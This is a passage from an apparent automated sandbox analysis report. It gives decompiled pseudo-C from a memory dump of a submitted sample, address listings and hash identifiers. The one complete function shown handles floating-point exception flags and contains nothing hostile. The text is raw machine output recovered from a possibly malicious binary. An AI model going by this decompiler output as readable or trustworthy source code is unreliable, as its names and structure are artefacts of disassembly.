                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t759 + 0xec)) = ( *(_a28 + 0x38) ^ 0x00000001) +  *_t393;
                                                                                                                                                                                                                                                                      							_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v8 - 8;
                                                                                                                                                                                                                                                                      			}











































































                                                                                                                                                                                                                                                                      0x01197450
                                                                                                                                                                                                                                                                      0x01197459
                                                                                                                                                                                                                                                                      0x01197465
                                                                                                                                                                                                                                                                      0x01197470
                                                                                                                                                                                                                                                                      0x01197479
                                                                                                                                                                                                                                                                      0x01197485
                                                                                                                                                                                                                                                                      0x0119748b
                                                                                                                                                                                                                                                                      0x01197497
                                                                                                                                                                                                                                                                      0x011977c6
                                                                                                                                                                                                                                                                      0x0119795e
                                                                                                                                                                                                                                                                      0x0119796c
                                                                                                                                                                                                                                                                      0x011979a4
                                                                                                                                                                                                                                                                      0x01197969
                                                                                                                                                                                                                                                                      0x01197969
                                                                                                                                                                                                                                                                      0x011977cc
                                                                                                                                                                                                                                                                      0x011977ec
                                                                                                                                                                                                                                                                      0x011977f2
                                                                                                                                                                                                                                                                      0x011977ff
                                                                                                                                                                                                                                                                      0x01197923
                                                                                                                                                                                                                                                                      0x01197948
                                                                                                                                                                                                                                                                      0x01197948
                                                                                                                                                                                                                                                                      0x01197805
                                                                                                                                                                                                                                                                      0x01197813
                                                                                                                                                                                                                                                                      0x01197819
                                                                                                                                                                                                                                                                      0x0119781f
                                                                                                                                                                                                                                                                      0x0119783b
                                                                                                                                                                                                                                                                      0x01197848
                                                                                                                                                                                                                                                                      0x01197854
                                                                                                                                                                                                                                                                      0x01197869
                                                                                                                                                                                                                                                                      0x0119787f
                                                                                                                                                                                                                                                                      0x0119789f
                                                                                                                                                                                                                                                                      0x011978c2
                                                                                                                                                                                                                                                                      0x011978c5
                                                                                                                                                                                                                                                                      0x011978cb
                                                                                                                                                                                                                                                                      0x011978d9
                                                                                                                                                                                                                                                                      0x01197904
                                                                                                                                                                                                                                                                      0x01197904
                                                                                                                                                                                                                                                                      0x0119790b
                                                                                                                                                                                                                                                                      0x0119794e
                                                                                                                                                                                                                                                                      0x0119749d
                                                                                                                                                                                                                                                                      0x0119749d
                                                                                                                                                                                                                                                                      0x011974a3
                                                                                                                                                                                                                                                                      0x011974ad
                                                                                                                                                                                                                                                                      0x011974bf
                                                                                                                                                                                                                                                                      0x011974db
                                                                                                                                                                                                                                                                      0x011974de
                                                                                                                                                                                                                                                                      0x011974e7
                                                                                                                                                                                                                                                                      0x011974eb
                                                                                                                                                                                                                                                                      0x011974f9
                                                                                                                                                                                                                                                                      0x01197514
                                                                                                                                                                                                                                                                      0x0119753d
                                                                                                                                                                                                                                                                      0x0119754e
                                                                                                                                                                                                                                                                      0x0119755e
                                                                                                                                                                                                                                                                      0x01197563
                                                                                                                                                                                                                                                                      0x01197569
                                                                                                                                                                                                                                                                      0x0119756f
                                                                                                                                                                                                                                                                      0x01197588
                                                                                                                                                                                                                                                                      0x011975a0
                                                                                                                                                                                                                                                                      0x011975b2
                                                                                                                                                                                                                                                                      0x011975b8
                                                                                                                                                                                                                                                                      0x011975c4
                                                                                                                                                                                                                                                                      0x011975ca
                                                                                                                                                                                                                                                                      0x011975d3
                                                                                                                                                                                                                                                                      0x011975ea
                                                                                                                                                                                                                                                                      0x011975f0
                                                                                                                                                                                                                                                                      0x01197621
                                                                                                                                                                                                                                                                      0x01197638
                                                                                                                                                                                                                                                                      0x0119764b
                                                                                                                                                                                                                                                                      0x0119765f
                                                                                                                                                                                                                                                                      0x01197664
                                                                                                                                                                                                                                                                      0x0119767a
                                                                                                                                                                                                                                                                      0x01197680
                                                                                                                                                                                                                                                                      0x01197683
                                                                                                                                                                                                                                                                      0x0119768b
                                                                                                                                                                                                                                                                      0x01197696
                                                                                                                                                                                                                                                                      0x0119769c
                                                                                                                                                                                                                                                                      0x011976a8
                                                                                                                                                                                                                                                                      0x011976ab
                                                                                                                                                                                                                                                                      0x011976b0
                                                                                                                                                                                                                                                                      0x011976b6
                                                                                                                                                                                                                                                                      0x011976bc
                                                                                                                                                                                                                                                                      0x011976d1
                                                                                                                                                                                                                                                                      0x011976e0
                                                                                                                                                                                                                                                                      0x011976e3
                                                                                                                                                                                                                                                                      0x011976e8
                                                                                                                                                                                                                                                                      0x011976eb
                                                                                                                                                                                                                                                                      0x011976f1
                                                                                                                                                                                                                                                                      0x011976fe
                                                                                                                                                                                                                                                                      0x01197704
                                                                                                                                                                                                                                                                      0x01197744
                                                                                                                                                                                                                                                                      0x0119775c
                                                                                                                                                                                                                                                                      0x0119776d
                                                                                                                                                                                                                                                                      0x01197774
                                                                                                                                                                                                                                                                      0x011974bc
                                                                                                                                                                                                                                                                      0x011974bc
                                                                                                                                                                                                                                                                      0x01197781
                                                                                                                                                                                                                                                                      0x01197788
                                                                                                                                                                                                                                                                      0x0119778e
                                                                                                                                                                                                                                                                      0x01197796
                                                                                                                                                                                                                                                                      0x0119779c
                                                                                                                                                                                                                                                                      0x0119779c
                                                                                                                                                                                                                                                                      0x011979b5
                                                                                                                                                                                                                                                                      0x011979c6
                                                                                                                                                                                                                                                                      0x01197a19
                                                                                                                                                                                                                                                                      0x01197a3b
                                                                                                                                                                                                                                                                      0x01197a3b
                                                                                                                                                                                                                                                                      0x011979c8
                                                                                                                                                                                                                                                                      0x011979c8
                                                                                                                                                                                                                                                                      0x011979ce
                                                                                                                                                                                                                                                                      0x011979e5
                                                                                                                                                                                                                                                                      0x011979eb
                                                                                                                                                                                                                                                                      0x011979eb
                                                                                                                                                                                                                                                                      0x01197a4c
                                                                                                                                                                                                                                                                      0x01197a52
                                                                                                                                                                                                                                                                      0x01197a64
                                                                                                                                                                                                                                                                      0x01197aab
                                                                                                                                                                                                                                                                      0x01197ad5
                                                                                                                                                                                                                                                                      0x01197aea
                                                                                                                                                                                                                                                                      0x01197aed
                                                                                                                                                                                                                                                                      0x01197af6
                                                                                                                                                                                                                                                                      0x01197afa
                                                                                                                                                                                                                                                                      0x01197b05
                                                                                                                                                                                                                                                                      0x01197b0d
                                                                                                                                                                                                                                                                      0x01197b28
                                                                                                                                                                                                                                                                      0x01197b43
                                                                                                                                                                                                                                                                      0x01197b52
                                                                                                                                                                                                                                                                      0x01197b6a
                                                                                                                                                                                                                                                                      0x01197b79
                                                                                                                                                                                                                                                                      0x01197b7c
                                                                                                                                                                                                                                                                      0x01197b82
                                                                                                                                                                                                                                                                      0x01197b88
                                                                                                                                                                                                                                                                      0x01197b90
                                                                                                                                                                                                                                                                      0x01197b93
                                                                                                                                                                                                                                                                      0x01197b9c
                                                                                                                                                                                                                                                                      0x01197bc6
                                                                                                                                                                                                                                                                      0x01197bd4
                                                                                                                                                                                                                                                                      0x01197bda
                                                                                                                                                                                                                                                                      0x01197bf9
                                                                                                                                                                                                                                                                      0x01197c17
                                                                                                                                                                                                                                                                      0x01197c3d
                                                                                                                                                                                                                                                                      0x01197c55
                                                                                                                                                                                                                                                                      0x01197c66
                                                                                                                                                                                                                                                                      0x01197c73
                                                                                                                                                                                                                                                                      0x01197c84
                                                                                                                                                                                                                                                                      0x01197c97
                                                                                                                                                                                                                                                                      0x01197c9c
                                                                                                                                                                                                                                                                      0x01197ca3
                                                                                                                                                                                                                                                                      0x01197ca9
                                                                                                                                                                                                                                                                      0x01197a61
                                                                                                                                                                                                                                                                      0x01197a61
                                                                                                                                                                                                                                                                      0x01197cbc
                                                                                                                                                                                                                                                                      0x01197cc5
                                                                                                                                                                                                                                                                      0x01197ccf
                                                                                                                                                                                                                                                                      0x01197ce8
                                                                                                                                                                                                                                                                      0x01197d01
                                                                                                                                                                                                                                                                      0x01197cd1
                                                                                                                                                                                                                                                                      0x01197cd4
                                                                                                                                                                                                                                                                      0x01197cd4
                                                                                                                                                                                                                                                                      0x01197d0d
                                                                                                                                                                                                                                                                      0x01197d10
                                                                                                                                                                                                                                                                      0x01197d22
                                                                                                                                                                                                                                                                      0x01197d2f
                                                                                                                                                                                                                                                                      0x01197d34
                                                                                                                                                                                                                                                                      0x01197d3d
                                                                                                                                                                                                                                                                      0x01197d45
                                                                                                                                                                                                                                                                      0x01197d48
                                                                                                                                                                                                                                                                      0x01197d4e
                                                                                                                                                                                                                                                                      0x01197d57
                                                                                                                                                                                                                                                                      0x01197d69
                                                                                                                                                                                                                                                                      0x01197d6c
                                                                                                                                                                                                                                                                      0x01197d81
                                                                                                                                                                                                                                                                      0x01197dae
                                                                                                                                                                                                                                                                      0x01197dd0
                                                                                                                                                                                                                                                                      0x01197de3
                                                                                                                                                                                                                                                                      0x01197de9
                                                                                                                                                                                                                                                                      0x01197e10
                                                                                                                                                                                                                                                                      0x01197e29
                                                                                                                                                                                                                                                                      0x01197e41
                                                                                                                                                                                                                                                                      0x01197e50
                                                                                                                                                                                                                                                                      0x01197e56
                                                                                                                                                                                                                                                                      0x01197e5c
                                                                                                                                                                                                                                                                      0x01197e62
                                                                                                                                                                                                                                                                      0x01197d1f
                                                                                                                                                                                                                                                                      0x01197d1f
                                                                                                                                                                                                                                                                      0x01197d22
                                                                                                                                                                                                                                                                      0x01197a4c
                                                                                                                                                                                                                                                                      0x01197e78

                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: "'
                                                                                                                                                                                                                                                                      • API String ID: 0-1130488244
                                                                                                                                                                                                                                                                      • Opcode ID: 5b2b36298da08f2c46f08d1543bf2a27e712fd3c0b6944e948202a705465d939
                                                                                                                                                                                                                                                                      • Instruction ID: 384d712c8e66578962ab3ef7e218539a77e519bb7d4b1c320dfe4d116a21cfc9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b2b36298da08f2c46f08d1543bf2a27e712fd3c0b6944e948202a705465d939
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B621D74600149CFD718CF58E598BA9B7B2FF98308F15827AD9599B399CB34E842CF84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118CDF6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _t172;
                                                                                                                                                                                                                                                                      				signed int _t175;
                                                                                                                                                                                                                                                                      				signed int _t178;
                                                                                                                                                                                                                                                                      				signed int* _t179;
                                                                                                                                                                                                                                                                      				signed int _t195;
                                                                                                                                                                                                                                                                      				signed int _t199;
                                                                                                                                                                                                                                                                      				signed int _t202;
                                                                                                                                                                                                                                                                      				void* _t203;
                                                                                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                                                                                      				signed int _t209;
                                                                                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                                                                                      				signed int _t225;
                                                                                                                                                                                                                                                                      				unsigned int* _t240;
                                                                                                                                                                                                                                                                      				signed char _t242;
                                                                                                                                                                                                                                                                      				signed int* _t250;
                                                                                                                                                                                                                                                                      				unsigned int* _t256;
                                                                                                                                                                                                                                                                      				signed int* _t257;
                                                                                                                                                                                                                                                                      				signed char _t259;
                                                                                                                                                                                                                                                                      				long _t262;
                                                                                                                                                                                                                                                                      				signed int* _t265;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				 *(_a4 + 4) = 0;
                                                                                                                                                                                                                                                                      				_t262 = 0xc000000d;
                                                                                                                                                                                                                                                                      				 *(_a4 + 8) = 0;
                                                                                                                                                                                                                                                                      				 *(_a4 + 0xc) = 0;
                                                                                                                                                                                                                                                                      				_t242 = _a12;
                                                                                                                                                                                                                                                                      				if((_t242 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                      					_t262 = 0xc000008f;
                                                                                                                                                                                                                                                                      					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t242 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                      					_t262 = 0xc0000093;
                                                                                                                                                                                                                                                                      					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t242 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                      					_t262 = 0xc0000091;
                                                                                                                                                                                                                                                                      					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t242 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                      					_t262 = 0xc000008e;
                                                                                                                                                                                                                                                                      					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t242 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                      					_t262 = 0xc0000090;
                                                                                                                                                                                                                                                                      					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t265 = _a8;
                                                                                                                                                                                                                                                                      				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                                                                                                                                                                                                                      				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                                                                                                                                                                                                                                      				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                                                                                                                                                                                                                      				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                                                                                                                                                                                                                      				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                                                                                                                                                                                                                                      				_t259 = E0118D2C8(_a4);
                                                                                                                                                                                                                                                                      				if((_t259 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t259 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t259 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t259 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if((_t259 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t172 =  *_t265 & 0x00000c00;
                                                                                                                                                                                                                                                                      				if(_t172 == 0) {
                                                                                                                                                                                                                                                                      					 *_a4 =  *_a4 & 0xfffffffc;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					if(_t172 == 0x400) {
                                                                                                                                                                                                                                                                      						_t257 = _a4;
                                                                                                                                                                                                                                                                      						_t225 =  *_t257 & 0xfffffffd | 1;
                                                                                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                                                                                      						 *_t257 = _t225;
                                                                                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                                                                                      						_t175 =  *_t265 & 0x00000300;
                                                                                                                                                                                                                                                                      						if(_t175 == 0) {
                                                                                                                                                                                                                                                                      							_t250 = _a4;
                                                                                                                                                                                                                                                                      							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                                                                                                                                                                                                                                      							L35:
                                                                                                                                                                                                                                                                      							 *_t250 = _t178;
                                                                                                                                                                                                                                                                      							L36:
                                                                                                                                                                                                                                                                      							_t179 = _a4;
                                                                                                                                                                                                                                                                      							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                                                      							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                                                      							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                                                                                                                                                                                                                      							if(_a28 == 0) {
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                                                      								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                                                      								_t254 = _a4;
                                                                                                                                                                                                                                                                      								_t240 = _a24;
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x50) =  *_t240;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                                                      								_t240 = _a24;
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                                                                                                                                                                                                                      								 *(_a4 + 0x50) =  *_t240;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							E0118D22E(_t254);
                                                                                                                                                                                                                                                                      							RaiseException(_t262, 0, 1,  &_a4);
                                                                                                                                                                                                                                                                      							_t256 = _a4;
                                                                                                                                                                                                                                                                      							if((_t256[2] & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                      								 *_t265 =  *_t265 & 0xfffffffe;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if((_t256[2] & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                      								 *_t265 =  *_t265 & 0xfffffffb;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if((_t256[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                      								 *_t265 =  *_t265 & 0xfffffff7;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if((_t256[2] & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                      								 *_t265 =  *_t265 & 0xffffffef;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if((_t256[2] & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                      								 *_t265 =  *_t265 & 0xffffffdf;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t195 =  *_t256 & 0x00000003;
                                                                                                                                                                                                                                                                      							if(_t195 == 0) {
                                                                                                                                                                                                                                                                      								 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t206 = _t195 - 1;
                                                                                                                                                                                                                                                                      								if(_t206 == 0) {
                                                                                                                                                                                                                                                                      									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                                                                                                                                                                                                                                      									L55:
                                                                                                                                                                                                                                                                      									 *_t265 = _t209;
                                                                                                                                                                                                                                                                      									L58:
                                                                                                                                                                                                                                                                      									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                                                                                                                                                                                                                                      									if(_t199 == 0) {
                                                                                                                                                                                                                                                                      										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                                                                                                                                                                                                                                      										L64:
                                                                                                                                                                                                                                                                      										 *_t265 = _t202;
                                                                                                                                                                                                                                                                      										L65:
                                                                                                                                                                                                                                                                      										if(_a28 == 0) {
                                                                                                                                                                                                                                                                      											 *_t240 = _t256[0x14];
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											 *_t240 = _t256[0x14];
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										return _t202;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t203 = _t199 - 1;
                                                                                                                                                                                                                                                                      									if(_t203 == 0) {
                                                                                                                                                                                                                                                                      										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                                                                                                                                                                                                                                      										goto L64;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t202 = _t203 - 1;
                                                                                                                                                                                                                                                                      									if(_t202 == 0) {
                                                                                                                                                                                                                                                                      										 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									goto L65;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t210 = _t206 - 1;
                                                                                                                                                                                                                                                                      								if(_t210 == 0) {
                                                                                                                                                                                                                                                                      									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                                                                                                                                                                                                                                      									goto L55;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(_t210 == 1) {
                                                                                                                                                                                                                                                                      									 *_t265 =  *_t265 | 0x00000c00;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							goto L58;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_t175 == 0x200) {
                                                                                                                                                                                                                                                                      							_t250 = _a4;
                                                                                                                                                                                                                                                                      							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                                                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_t175 == 0x300) {
                                                                                                                                                                                                                                                                      							 *_a4 =  *_a4 & 0xffffffe3;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_t172 == 0x800) {
                                                                                                                                                                                                                                                                      						_t257 = _a4;
                                                                                                                                                                                                                                                                      						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                                                                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_t172 == 0xc00) {
                                                                                                                                                                                                                                                                      						 *_a4 =  *_a4 | 0x00000003;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}























                                                                                                                                                                                                                                                                      0x0118ce04
                                                                                                                                                                                                                                                                      0x0118ce0b
                                                                                                                                                                                                                                                                      0x0118ce10
                                                                                                                                                                                                                                                                      0x0118ce16
                                                                                                                                                                                                                                                                      0x0118ce19
                                                                                                                                                                                                                                                                      0x0118ce1f
                                                                                                                                                                                                                                                                      0x0118ce24
                                                                                                                                                                                                                                                                      0x0118ce29
                                                                                                                                                                                                                                                                      0x0118ce29
                                                                                                                                                                                                                                                                      0x0118ce2f
                                                                                                                                                                                                                                                                      0x0118ce34
                                                                                                                                                                                                                                                                      0x0118ce39
                                                                                                                                                                                                                                                                      0x0118ce39
                                                                                                                                                                                                                                                                      0x0118ce40
                                                                                                                                                                                                                                                                      0x0118ce45
                                                                                                                                                                                                                                                                      0x0118ce4a
                                                                                                                                                                                                                                                                      0x0118ce4a
                                                                                                                                                                                                                                                                      0x0118ce51
                                                                                                                                                                                                                                                                      0x0118ce56
                                                                                                                                                                                                                                                                      0x0118ce5b
                                                                                                                                                                                                                                                                      0x0118ce5b
                                                                                                                                                                                                                                                                      0x0118ce62
                                                                                                                                                                                                                                                                      0x0118ce67
                                                                                                                                                                                                                                                                      0x0118ce6c
                                                                                                                                                                                                                                                                      0x0118ce6c
                                                                                                                                                                                                                                                                      0x0118ce74
                                                                                                                                                                                                                                                                      0x0118ce84
                                                                                                                                                                                                                                                                      0x0118ce96
                                                                                                                                                                                                                                                                      0x0118cea8
                                                                                                                                                                                                                                                                      0x0118cebb
                                                                                                                                                                                                                                                                      0x0118cecd
                                                                                                                                                                                                                                                                      0x0118ced5
                                                                                                                                                                                                                                                                      0x0118ceda
                                                                                                                                                                                                                                                                      0x0118cedf
                                                                                                                                                                                                                                                                      0x0118cedf
                                                                                                                                                                                                                                                                      0x0118cee6
                                                                                                                                                                                                                                                                      0x0118ceeb
                                                                                                                                                                                                                                                                      0x0118ceeb
                                                                                                                                                                                                                                                                      0x0118cef2
                                                                                                                                                                                                                                                                      0x0118cef7
                                                                                                                                                                                                                                                                      0x0118cef7
                                                                                                                                                                                                                                                                      0x0118cefe
                                                                                                                                                                                                                                                                      0x0118cf03
                                                                                                                                                                                                                                                                      0x0118cf03
                                                                                                                                                                                                                                                                      0x0118cf0a
                                                                                                                                                                                                                                                                      0x0118cf0f
                                                                                                                                                                                                                                                                      0x0118cf0f
                                                                                                                                                                                                                                                                      0x0118cf19
                                                                                                                                                                                                                                                                      0x0118cf1b
                                                                                                                                                                                                                                                                      0x0118cf55
                                                                                                                                                                                                                                                                      0x0118cf1d
                                                                                                                                                                                                                                                                      0x0118cf22
                                                                                                                                                                                                                                                                      0x0118cf46
                                                                                                                                                                                                                                                                      0x0118cf4e
                                                                                                                                                                                                                                                                      0x0118cf42
                                                                                                                                                                                                                                                                      0x0118cf42
                                                                                                                                                                                                                                                                      0x0118cf58
                                                                                                                                                                                                                                                                      0x0118cf5f
                                                                                                                                                                                                                                                                      0x0118cf61
                                                                                                                                                                                                                                                                      0x0118cf83
                                                                                                                                                                                                                                                                      0x0118cf8b
                                                                                                                                                                                                                                                                      0x0118cf8e
                                                                                                                                                                                                                                                                      0x0118cf8e
                                                                                                                                                                                                                                                                      0x0118cf90
                                                                                                                                                                                                                                                                      0x0118cf90
                                                                                                                                                                                                                                                                      0x0118cf9b
                                                                                                                                                                                                                                                                      0x0118cfa1
                                                                                                                                                                                                                                                                      0x0118cfa6
                                                                                                                                                                                                                                                                      0x0118cfad
                                                                                                                                                                                                                                                                      0x0118cfe7
                                                                                                                                                                                                                                                                      0x0118cff2
                                                                                                                                                                                                                                                                      0x0118cff8
                                                                                                                                                                                                                                                                      0x0118cffb
                                                                                                                                                                                                                                                                      0x0118cffe
                                                                                                                                                                                                                                                                      0x0118d00a
                                                                                                                                                                                                                                                                      0x0118d012
                                                                                                                                                                                                                                                                      0x0118cfaf
                                                                                                                                                                                                                                                                      0x0118cfb2
                                                                                                                                                                                                                                                                      0x0118cfbe
                                                                                                                                                                                                                                                                      0x0118cfc4
                                                                                                                                                                                                                                                                      0x0118cfca
                                                                                                                                                                                                                                                                      0x0118cfcd
                                                                                                                                                                                                                                                                      0x0118cfd6
                                                                                                                                                                                                                                                                      0x0118cfd6
                                                                                                                                                                                                                                                                      0x0118d015
                                                                                                                                                                                                                                                                      0x0118d023
                                                                                                                                                                                                                                                                      0x0118d029
                                                                                                                                                                                                                                                                      0x0118d030
                                                                                                                                                                                                                                                                      0x0118d032
                                                                                                                                                                                                                                                                      0x0118d032
                                                                                                                                                                                                                                                                      0x0118d039
                                                                                                                                                                                                                                                                      0x0118d03b
                                                                                                                                                                                                                                                                      0x0118d03b
                                                                                                                                                                                                                                                                      0x0118d042
                                                                                                                                                                                                                                                                      0x0118d044
                                                                                                                                                                                                                                                                      0x0118d044
                                                                                                                                                                                                                                                                      0x0118d04b
                                                                                                                                                                                                                                                                      0x0118d04d
                                                                                                                                                                                                                                                                      0x0118d04d
                                                                                                                                                                                                                                                                      0x0118d054
                                                                                                                                                                                                                                                                      0x0118d056
                                                                                                                                                                                                                                                                      0x0118d056
                                                                                                                                                                                                                                                                      0x0118d063
                                                                                                                                                                                                                                                                      0x0118d066
                                                                                                                                                                                                                                                                      0x0118d09d
                                                                                                                                                                                                                                                                      0x0118d068
                                                                                                                                                                                                                                                                      0x0118d068
                                                                                                                                                                                                                                                                      0x0118d06b
                                                                                                                                                                                                                                                                      0x0118d096
                                                                                                                                                                                                                                                                      0x0118d08b
                                                                                                                                                                                                                                                                      0x0118d08b
                                                                                                                                                                                                                                                                      0x0118d09f
                                                                                                                                                                                                                                                                      0x0118d0a7
